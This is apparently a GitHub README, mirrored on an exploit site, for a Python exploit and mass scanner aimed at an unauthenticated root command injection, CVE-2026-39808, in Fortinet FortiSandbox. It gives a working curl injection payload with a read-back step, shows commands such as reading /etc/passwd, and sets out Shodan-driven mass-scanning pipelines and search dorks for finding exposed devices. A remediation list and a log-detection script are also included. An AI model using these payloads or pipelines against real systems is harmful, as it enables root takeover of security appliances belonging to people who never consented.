## https://sploitus.com/exploit?id=FAA1A934-A62D-5448-8D9B-5248D4D27C6B
# FortiSandbox RCE Scanner – CVE-2026-39808
Unauthenticated OS Command Injection as root in Fortinet FortiSandbox
Vulnerability • Installation • Usage • How It Works • Pipeline • Shodan Dorks • Disclaimer
---
## Vulnerability
**CVE-2026-39808** is a critical unauthenticated OS command injection vulnerability in Fortinet FortiSandbox. The `/fortisandbox/job-detail/tracer-behavior` API endpoint fails to sanitize the `jid` parameter, allowing an attacker to inject arbitrary OS commands that execute as **root** – without any authentication.
| Detail | Value |
|---|---|
| **CVE ID** | CVE-2026-39808 |
| **CVSS Score** | 9.8 (Critical) |
| **Attack Vector** | Network |
| **Authentication** | None |
| **Privileges** | Root |
| **Affected Versions** | FortiSandbox (version list truncated in source) |

Only the tail of the injection request survives in the source:
```http
/web/ng/out.txt)| HTTP/1.1
```
The output is written to `/web/ng/out.txt`, which is accessible at `/ng/out.txt` on the web server – providing a convenient read-back mechanism for blind command injection.
---
## Installation
Zero dependencies. Python 3.7+ standard library only.
```bash
git clone https://github.com/ynsmroztas/FortiSandbox-RCE-Exploit-CVE-2026-39808
cd FortiSandbox-RCE-Exploit-CVE-2026-39808
chmod +x fortisandbox_rce.py
```
---
## Usage
### Basic Scan
```bash
# Verify if a target is vulnerable (uses canary-based detection)
python3 fortisandbox_rce.py -u https://fortisandbox.target.com
```
### Execute Command
```bash
# Execute a specific command on the target
python3 fortisandbox_rce.py -u https://target.com --cmd "id"
python3 fortisandbox_rce.py -u https://target.com --cmd "cat /etc/passwd"
python3 fortisandbox_rce.py -u https://target.com --cmd "uname -a"
```
### Verify Only (No Command Execution)
```bash
# Only check if vulnerable, don't execute --cmd
python3 fortisandbox_rce.py -u https://target.com --verify-only
```
### With Burp Proxy
```bash
python3 fortisandbox_rce.py -u https://target.com --cmd "id" --proxy http://127.0.0.1:8080
```
### JSON Report
```bash
python3 fortisandbox_rce.py -u https://target.com -o report.json
```
### Pipeline Mode (Mass Scanning)
```bash
# From a URL list
cat targets.txt | python3 fortisandbox_rce.py --stdin --verify-only -o report.json
# subfinder → httpx → scanner
subfinder -d target.com -silent | httpx -silent | python3 fortisandbox_rce.py --stdin
# Shodan → scanner
shodan search 'title:"FortiSandbox"' --fields ip_str,port --separator : | \
sed 's/^/https:\/\//' | httpx -silent | \
python3 fortisandbox_rce.py --stdin --verify-only -o results.json
```
### All Options
```
usage: fortisandbox_rce.py [-h] [-u URL] [--stdin] [--cmd CMD] [--verify-only]
[--proxy PROXY] [--timeout TIMEOUT]
[--rate-limit RATE_LIMIT] [-o OUTPUT] [--no-banner]
Options:
-u, --url URL Target URL
--stdin Read URLs from stdin (pipeline mode)
--cmd CMD OS command to execute (default: id)
--verify-only Only verify vulnerability, don't execute --cmd
--proxy PROXY HTTP proxy (e.g., http://127.0.0.1:8080)
--timeout TIMEOUT HTTP timeout in seconds (default: 15)
--rate-limit RATE_LIMIT Delay between targets in ms (default: 0)
-o, --output FILE Output JSON report file
--no-banner Suppress banner
```
---
## How It Works
The scanner uses a **5-step verification process** with strict false positive prevention:
```
Step 1 → Detect FortiSandbox (title/header fingerprint)
Step 2 → Check if vulnerable endpoint exists
Step 3 → Inject unique canary string via command injection
Step 4 → Read /ng/out.txt and verify canary (strict plain-text validation)
Step 5 → Execute user command + cleanup
```
### False Positive Prevention
The scanner implements multiple layers of validation to eliminate false positives:
- **HTML Detection** – If the output URL returns an HTML page (Angular SPA catch-all), it's flagged as a false positive
- **Content-Type Validation** – Command output must not be `text/html`
- **Canary Isolation** – The canary must appear in clean plain text, not embedded in HTML tags
- **`id` Output Regex** – Strict `uid=\d+(\w+)` pattern matching with size sanity check (remainder of this item truncated in source)
---
## Pipeline
The first command of this block is truncated in the source; only its tail survives.
```bash
# (first command truncated in source; surviving tail below)
/dev/null | \
tee vulnerable_fortisandbox.txt
# Chain with nuclei for further testing
cat vulnerable_fortisandbox.txt | nuclei -t cves/
# Silent mass scan with rate limiting
cat shodan_results.txt | \
python3 fortisandbox_rce.py --stdin --verify-only --rate-limit 1000 --no-banner -o report.json
```
---
## Shodan Dorks
```
title:"FortiSandbox"
title:"FortiSandbox - Please login"
http.html:"FortiSandbox" port:443
"FortiSandbox" ssl:"Fortinet"
http.favicon.hash:-1222072778
```
**Censys:**
```
services.http.response.html_title:"FortiSandbox"
```
**FOFA:**
```
title="FortiSandbox - Please login"
title="FortiSandbox" && country="TR"
```
**Google Dork:**
```
intitle:"FortiSandbox - Please login"
```
---
## Manual Verification
If you prefer to verify manually using curl:
```bash
# Step 1: Inject command
curl -s -k --get "https://TARGET/fortisandbox/job-detail/tracer-behavior" \
--data-urlencode "jid=|(id > /web/ng/out.txt)|"
# Step 2: Read output
curl -s -k "https://TARGET/ng/out.txt"
# Expected: uid=0(root) gid=0(root) groups=0(root)
```
---
## Remediation
- **Upgrade** FortiSandbox to version **4.4.9 or above**
- If immediate patching is not possible:
  - Restrict network access to the FortiSandbox management interface
  - Use firewall rules to block external access to `/fortisandbox/job-detail/` endpoints
  - Monitor logs for suspicious `jid` parameter values containing pipe characters
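The last mitigation above, written out as a small log detector. This is an added example, not part of the tool or of Fortinet's product: it assumes a combined-style web access log (the real appliance's log format is not given here) and flags requests to the vulnerable endpoint whose decoded `jid` contains shell metacharacters, plus follow-up reads of the `/ng/out.txt` read-back path.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from any real FortiSandbox appliance).
# The second line carries the URL-encoded form of the PoC payload from this README.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2026:12:00:01 +0000] "GET /fortisandbox/job-detail/tracer-behavior?jid=12345 HTTP/1.1" 200 512
203.0.113.7 - - [10/Apr/2026:12:00:02 +0000] "GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28id%20%3E%20%2Fweb%2Fng%2Fout.txt%29%7C HTTP/1.1" 200 0
203.0.113.7 - - [10/Apr/2026:12:00:03 +0000] "GET /ng/out.txt HTTP/1.1" 200 40
203.0.113.9 - - [10/Apr/2026:12:00:04 +0000] "GET /fortisandbox/job-detail/tracer-behavior?jid=abc123 HTTP/1.1" 200 512
"""

# Assumed combined-log layout: ip ident user [timestamp] "METHOD target PROTO" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_PATH = "/fortisandbox/job-detail/tracer-behavior"
READBACK_PATH = "/ng/out.txt"
# Shell metacharacters that have no business in a job id.
SHELL_META = re.compile(r"[|;&`$()<>\n]")


def suspicious_jid(target: str):
    """Return the decoded jid value if it contains shell metacharacters, else None."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes, so encoded pipes/parentheses are caught too.
    for value in parse_qs(parts.query, keep_blank_values=True).get("jid", []):
        if SHELL_META.search(value):
            return value
    return None


def scan_log(text: str):
    """Return (ip, timestamp, kind, detail) findings for injection attempts and read-backs."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        jid = suspicious_jid(target)
        if jid is not None:
            findings.append((m.group("ip"), m.group("ts"), "jid_injection", jid))
        elif urlsplit(target).path == READBACK_PATH:
            findings.append((m.group("ip"), m.group("ts"), "out_txt_readback", target))
    return findings
```

An injection finding followed shortly by a read-back from the same source address is the pattern worth alerting on; a lone `/ng/out.txt` hit is lower confidence on its own.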
---
## Timeline
| Date | Event |
|---|---|
| November 2025 | Vulnerability discovered |
| April 2026 | CVE-2026-39808 published |
| April 2026 | Patched in FortiSandbox 4.4.9 |
---
## References
- [Fortinet PSIRT Advisory – FG-IR-25-325](https://fortiguard.fortinet.com/psirt/FG-IR-25-325)
- [CVE-2026-39808 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-39808)
---
## Disclaimer
This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Always obtain proper written authorization before testing. The author assumes no liability for misuse of this tool.
---
## Author
**mitsec** – [@ynsmroztas](https://x.com/ynsmroztas)
- Portfolio: [ynsmroztas.github.io](https://ynsmroztas.github.io)
- 100+ Hall of Fame | 2,430+ Vulnerabilities Disclosed | 1,100+ Critical Findings
---
If this tool helped you, consider giving it a ⭐